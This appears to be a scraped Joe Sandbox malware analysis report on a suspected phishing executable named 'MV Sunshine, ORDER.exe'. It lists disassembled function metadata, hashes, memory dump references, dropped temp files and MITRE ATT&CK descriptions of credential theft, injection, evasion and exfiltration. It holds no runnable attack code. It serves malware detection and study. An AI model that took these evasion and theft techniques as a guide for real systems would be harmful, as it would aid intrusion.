Memory Dump Source

Source File: 00000000.00000002.1691487335.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.1691473549.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691529951.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691529951.0000000000A35000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691569155.0000000000A3F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691703583.0000000000A48000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_MV Sunshine, ORDER.jbxd

Similarity

API ID: Internet$OpenOption
String ID: <local>
API String ID: 942729171-4266983199
Opcode ID: 21adde23335d31cb6d4f9ca02219e9814caa4324683b555f1aafe3079ca076da
Instruction ID: 0b4d46e3fd126d773330ae8c68b3e2462a674ad91fc5a187e8fb03e2b4179e25
Opcode Fuzzy Hash: 21adde23335d31cb6d4f9ca02219e9814caa4324683b555f1aafe3079ca076da
Instruction Fuzzy Hash: 9111A0B0541229BEDB248F518C99FBBFF6CFF16751F10852AFA0556040D2B0A942DBF1

Function 009F80A0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 55networkCOMMON

Download Yara Rule

APIs

Part of subcall function 009F830B: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,00000000,?,?,?,009F80C8,?,00000000,?,?), ref: 009F8322

inet_addr.WSOCK32(00000000,?,00000000,?,?,?,00000000), ref: 009F80CB
htons.WSOCK32(00000000,?,00000000), ref: 009F8108

Strings

255.255.255.255, xrefs: 009F80E3

Memory Dump Source

Source File: 00000000.00000002.1691487335.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.1691473549.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691529951.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691529951.0000000000A35000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691569155.0000000000A3F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691703583.0000000000A48000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_MV Sunshine, ORDER.jbxd

Similarity

API ID: ByteCharMultiWidehtonsinet_addr
String ID: 255.255.255.255
API String ID: 2496851823-2422070025
Opcode ID: 2e366793038a61debf72121b3ad4a12e11baee63268e89480012beb34211e1ca
Instruction ID: 16b05bdc6de98cd80a7097c9841732cf07a18c23afac06265baa56a138f7e814
Opcode Fuzzy Hash: 2e366793038a61debf72121b3ad4a12e11baee63268e89480012beb34211e1ca
Instruction Fuzzy Hash: 34118235644209ABDB20AF64CC56BBEB368EF44310F108617EA11A7291DA71A8158755

Function 009D92E7 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 52windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00987F41: _memmove.LIBCMT ref: 00987F82

Part of subcall function 009DB0C4: GetClassNameW.USER32(?,?,000000FF), ref: 009DB0E7

SendMessageW.USER32(?,000001A2,000000FF,?), ref: 009D9355

Strings

ListBox, xrefs: 009D931F
ComboBox, xrefs: 009D92F4

Memory Dump Source

Source File: 00000000.00000002.1691487335.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.1691473549.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691529951.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691529951.0000000000A35000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691569155.0000000000A3F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691703583.0000000000A48000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_MV Sunshine, ORDER.jbxd

Similarity

API ID: ClassMessageNameSend_memmove
String ID: ComboBox$ListBox
API String ID: 372448540-1403004172
Opcode ID: c1045fc515a54a40864d7531d48f19405ab12b223c0d2a2b3028f323e2509a43
Instruction ID: f5e99b4a230b1b616d04c10e9463a33f2a70d3726902b8feea278c5d448c2c84
Opcode Fuzzy Hash: c1045fc515a54a40864d7531d48f19405ab12b223c0d2a2b3028f323e2509a43
Instruction Fuzzy Hash: FC01B571A45214ABCB08FBA5CC919FEB76DBF46720B144A1AF932573D1DB31590C8750

Function 009D91DF Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 50windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00987F41: _memmove.LIBCMT ref: 00987F82

Part of subcall function 009DB0C4: GetClassNameW.USER32(?,?,000000FF), ref: 009DB0E7

SendMessageW.USER32(?,00000180,00000000,?), ref: 009D924D

Strings

ListBox, xrefs: 009D9217
ComboBox, xrefs: 009D91EC

Memory Dump Source

Source File: 00000000.00000002.1691487335.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.1691473549.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691529951.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691529951.0000000000A35000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691569155.0000000000A3F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691703583.0000000000A48000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_MV Sunshine, ORDER.jbxd

Similarity

API ID: ClassMessageNameSend_memmove
String ID: ComboBox$ListBox
API String ID: 372448540-1403004172
Opcode ID: 6bee05fb2ac783465120f537bb269a4d96dddddd921329935f01566ed373e61b
Instruction ID: 2b78fbd0d62e9cdfd232f8a9f2b0168a9ea1420840b673778b13c02d71bb4424
Opcode Fuzzy Hash: 6bee05fb2ac783465120f537bb269a4d96dddddd921329935f01566ed373e61b
Instruction Fuzzy Hash: DA018475A81108BBCB18FBA0C992EFF73ACAF55700F25411ABA1267381EB159F0C9661

Function 009D9264 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 49windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00987F41: _memmove.LIBCMT ref: 00987F82

Part of subcall function 009DB0C4: GetClassNameW.USER32(?,?,000000FF), ref: 009DB0E7

SendMessageW.USER32(?,00000182,?,00000000), ref: 009D92D0

Strings

ListBox, xrefs: 009D929C
ComboBox, xrefs: 009D9271

Memory Dump Source

Source File: 00000000.00000002.1691487335.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.1691473549.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691529951.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691529951.0000000000A35000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691569155.0000000000A3F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691703583.0000000000A48000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_MV Sunshine, ORDER.jbxd

Similarity

API ID: ClassMessageNameSend_memmove
String ID: ComboBox$ListBox
API String ID: 372448540-1403004172
Opcode ID: a8dcf74ea5c94ad34a64e7b719f8e4a8221faecba796939e872337c7a861e5de
Instruction ID: 17e908b51e0c69b84f870499071038b5caf2c8c456e4aa9699e727f7831f2df8
Opcode Fuzzy Hash: a8dcf74ea5c94ad34a64e7b719f8e4a8221faecba796939e872337c7a861e5de
Instruction Fuzzy Hash: 6401DB71A811087BCB04FBA4C982FFF77ACAF11700F254516791263381DB259F0C9271

Function 009E51CA Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 29COMMON

Download Yara Rule

APIs

GetClassNameW.USER32(?,?,00000100), ref: 009E51E8
_wcscmp.LIBCMT ref: 009E51FA

Strings

#32770, xrefs: 009E51F4

Memory Dump Source

Source File: 00000000.00000002.1691487335.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.1691473549.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691529951.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691529951.0000000000A35000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691569155.0000000000A3F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691703583.0000000000A48000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_MV Sunshine, ORDER.jbxd

Similarity

API ID: ClassName_wcscmp
String ID: #32770
API String ID: 2292705959-463685578
Opcode ID: c014ec2abb1b35c5267179107a878e13ea24122e0e3bbfccd8f1af60afb8f608
Instruction ID: 0b56251ac1bc37cec3409b14cb620bd8cc4463b8500191e18f8e26a9355c6752
Opcode Fuzzy Hash: c014ec2abb1b35c5267179107a878e13ea24122e0e3bbfccd8f1af60afb8f608
Instruction Fuzzy Hash: 30E0613390022C2BD320DAD59C05F97F7ACEB51731F000157FD10D3050D660994587D1

Function 009D81BC Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 22windowCOMMON

Download Yara Rule

APIs

MessageBoxW.USER32(00000000,Error allocating memory.,AutoIt,00000010), ref: 009D81CA

Part of subcall function 009A3598: _doexit.LIBCMT ref: 009A35A2

Strings

AutoIt, xrefs: 009D81BE
Error allocating memory., xrefs: 009D81C3

Memory Dump Source

Source File: 00000000.00000002.1691487335.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.1691473549.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691529951.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691529951.0000000000A35000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691569155.0000000000A3F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691703583.0000000000A48000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_MV Sunshine, ORDER.jbxd

Similarity

API ID: Message_doexit
String ID: AutoIt$Error allocating memory.
API String ID: 1993061046-4017498283
Opcode ID: bfd43c7424096a1c04b92cbd6e54fe6789d1401b07e53380433af9dafb11627c
Instruction ID: fe20991db16de87f17ffcc73dd33948970e897007d493e3e8a4e7b3876f5b27f
Opcode Fuzzy Hash: bfd43c7424096a1c04b92cbd6e54fe6789d1401b07e53380433af9dafb11627c
Instruction Fuzzy Hash: 07D05B323C536936D21533E86C07FC7754C4F45B51F004416BB08565D38DD295D242D9

Function 009BB511 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 22COMMON

Download Yara Rule

APIs

Part of subcall function 009BB564: _memset.LIBCMT ref: 009BB571

Part of subcall function 009A0B84: InitializeCriticalSectionAndSpinCount.KERNEL32(?,00000000,?,009BB540,?,?,?,0098100A), ref: 009A0B89

IsDebuggerPresent.KERNEL32(?,?,?,0098100A), ref: 009BB544
OutputDebugStringW.KERNEL32(ERROR : Unable to initialize critical section in CAtlBaseModule,?,?,?,0098100A), ref: 009BB553

Strings

ERROR : Unable to initialize critical section in CAtlBaseModule, xrefs: 009BB54E

Memory Dump Source

Source File: 00000000.00000002.1691487335.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.1691473549.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691529951.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691529951.0000000000A35000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691569155.0000000000A3F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691703583.0000000000A48000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_MV Sunshine, ORDER.jbxd

Similarity

API ID: CountCriticalDebugDebuggerInitializeOutputPresentSectionSpinString_memset
String ID: ERROR : Unable to initialize critical section in CAtlBaseModule
API String ID: 3158253471-631824599
Opcode ID: 96a4e74eaedb2b082ef02a2161f7ef23b73f09cf9c3b04412ffa8aa450b4ce77
Instruction ID: 72ebf6f3aa9e25c830972aa5bb4ae76b35a5df4a94fd4304e4397cbdd345e705
Opcode Fuzzy Hash: 96a4e74eaedb2b082ef02a2161f7ef23b73f09cf9c3b04412ffa8aa450b4ce77
Instruction Fuzzy Hash: B6E06D746003148FD730DF68E6043827BE4AF44724F00893CF456C6690D7F4E409CBA2

Function 00A05BEB Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15windowCOMMON

Download Yara Rule

APIs

FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00A05BF5
PostMessageW.USER32(00000000,00000111,00000197,00000000), ref: 00A05C08

Part of subcall function 009E54E6: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 009E555E

Strings

Shell_TrayWnd, xrefs: 00A05BEE

Memory Dump Source

Source File: 00000000.00000002.1691487335.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.1691473549.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691529951.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691529951.0000000000A35000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691569155.0000000000A3F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691703583.0000000000A48000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_MV Sunshine, ORDER.jbxd

Similarity

API ID: FindMessagePostSleepWindow
String ID: Shell_TrayWnd
API String ID: 529655941-2988720461
Opcode ID: 2ea058e18f42006139a1c24e9c6ff6d17108d9c49849bf56d5ff880505c5dc06
Instruction ID: 1806c395996d3e93e2ae6ab1ee7f862d97f547a0e9420caa0e0b96b86048d9b1
Opcode Fuzzy Hash: 2ea058e18f42006139a1c24e9c6ff6d17108d9c49849bf56d5ff880505c5dc06
Instruction Fuzzy Hash: 0AD0C931388355BBE778ABB0AC1BF976A14AB50B51F014829B645AA1E0D9E46802C650

Description:	Adversaries may obtain and abuse credentials of existing accounts as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. Compromised credentials may be used to bypass access controls placed on various resources on systems within the network and may even be used for persistent access to remote systems and externally available services, such as VPNs, Outlook Web Access, network devices, and remote desktop.Compromised credentials may also grant an adversary increased privilege to specific systems or access to restricted areas of the network. Adversaries may choose not to use malware or tools in conjunction with the legitimate access those credentials provide to make it harder to detect their presence.
Tactics:	Defense Evasion, Initial Access, Persistence, Privilege Escalation
Data Sources:	Logon Session: Logon Session Creation, Logon Session: Logon Session Metadata, User Account: User Account Authentication
Platforms:	Azure AD, Containers, Google Workspace, IaaS, Linux, macOS, Network, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may exploit software vulnerabilities in an attempt to elevate privileges. Exploitation of a software vulnerability occurs when an adversary takes advantage of a programming error in a program, service, or within the operating system software or kernel itself to execute adversary-controlled code. Security constructs such as permission levels will often hinder access to information and use of certain techniques, so adversaries will likely need to perform privilege escalation to include use of software exploitation to circumvent those restrictions.
Tactics:	Privilege Escalation
Data Sources:	Driver: Driver Load, Process: Process Creation
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may circumvent mechanisms designed to control elevate privileges to gain higher-level permissions. Most modern systems contain native elevation control mechanisms that are intended to limit privileges that a user can perform on a machine. Authorization has to be granted to specific users in order to perform tasks that can be considered of higher risk. An adversary can perform several methods to take advantage of built-in control mechanisms in order to escalate privileges on a system.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, User Account: User Account Modification, Windows Registry: Windows Registry Key Modification
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify access tokens to operate under a different user or system security context to perform actions and bypass access controls. Windows uses access tokens to determine the ownership of a running process. A user can manipulate access tokens to make a running process appear as though it is the child of a different process or belongs to someone other than the user that started the process. When this occurs, the process also takes on the security context associated with the new token.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	Active Directory: Active Directory Object Modification, Command: Command Execution, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, User Account: User Account Metadata
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use methods of capturing user input to obtain credentials or collect information. During normal system usage, users often provide credentials to various different locations, such as login pages/portals or system dialog boxes. Input capture mechanisms may be transparent to the user (e.g. Credential API Hooking ) or rely on deceiving the user into providing input into what they believe to be a genuine service (e.g. Web Portal Capture ).
Tactics:	Collection, Credential Access
Data Sources:	Driver: Driver Load, File: File Modification, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Windows Registry: Windows Registry Key Modification
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of valid accounts, usernames, or email addresses on a system or within a compromised environment. This information can help adversaries determine which accounts exist, which can aid in follow-on behavior such as brute-forcing, spear-phishing attacks, or account takeovers (e.g., Valid Accounts ).
Tactics:	Discovery
Data Sources:	Command: Command Execution, File: File Access, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to identify the primary user, currently logged in user, set of users that commonly uses a system, or whether a user is actively using the system. They may do this, for example, by retrieving account usernames or by using OS Credential Dumping . The information may be collected in a number of different ways using other Discovery techniques, because user and username details are prevalent throughout a system and include running process ownership, file/directory ownership, session information, and system logs. Adversaries may use the information from [System Owner/User Discovery](https://attack.mitre.org/techniques/T1033) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report MV Sunshine, ORDER.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Yara Signatures

Memory Dumps

Unpacked PEs

Sigma Signatures

System Summary

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Spreading

Software Vulnerabilities

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

E-Banking Fraud

System Summary

Data Obfuscation

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\Temp\23802I71

C:\Users\user\AppData\Local\Temp\autD2A9.tmp

C:\Users\user\AppData\Local\Temp\autD2D9.tmp

C:\Users\user\AppData\Local\Temp\preconform

C:\Users\user\AppData\Local\Temp\supergroups

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Rich Headers

Data Directories

Sections

Windows Analysis Report
MV Sunshine, ORDER.exe

Function 00983B4C Relevance: 17.7, APIs: 8, Strings: 2, Instructions: 153
windowCOMMON

Function 00984AFE Relevance: 10.7, APIs: 7, Instructions: 223
COMMON

Function 00984FE9 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 62
COMMON

Function 009E93DF Relevance: 19.8, APIs: 13, Instructions: 322
fileCOMMON

Function 00983015 Relevance: 19.3, APIs: 7, Strings: 4, Instructions: 71
windowregistryCOMMON

Function 00983041 Relevance: 19.3, APIs: 7, Strings: 4, Instructions: 54
windowregistryCOMMON

Function 009871EB Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 201
registryCOMMON

Function 00983A58 Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 71
windowregistryCOMMON

Function 00983633 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 151
windowtimeregistryCOMMON

Function 00983778 Relevance: 14.3, APIs: 1, Strings: 7, Instructions: 267
COMMON

Function 02222610 Relevance: 10.7, APIs: 7, Instructions: 239
fileCOMMON

Function 009839E7 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 44
COMMON

Function 022223B0 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 154
fileCOMMON

Description:	Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may target user email to collect sensitive information. Emails may contain sensitive data, including trade secrets or personal information, that can prove valuable to adversaries. Adversaries can collect or forward email from mail servers or clients.
Tactics:	Collection
Data Sources:	Application Log: Application Log Content, Command: Command Execution, File: File Access, Logon Session: Logon Session Creation, Network Traffic: Network Connection Creation
Platforms:	Google Workspace, Linux, macOS, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may collect data stored in the clipboard from users copying information within or between applications.
Tactics:	Collection
Data Sources:	Command: Command Execution, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
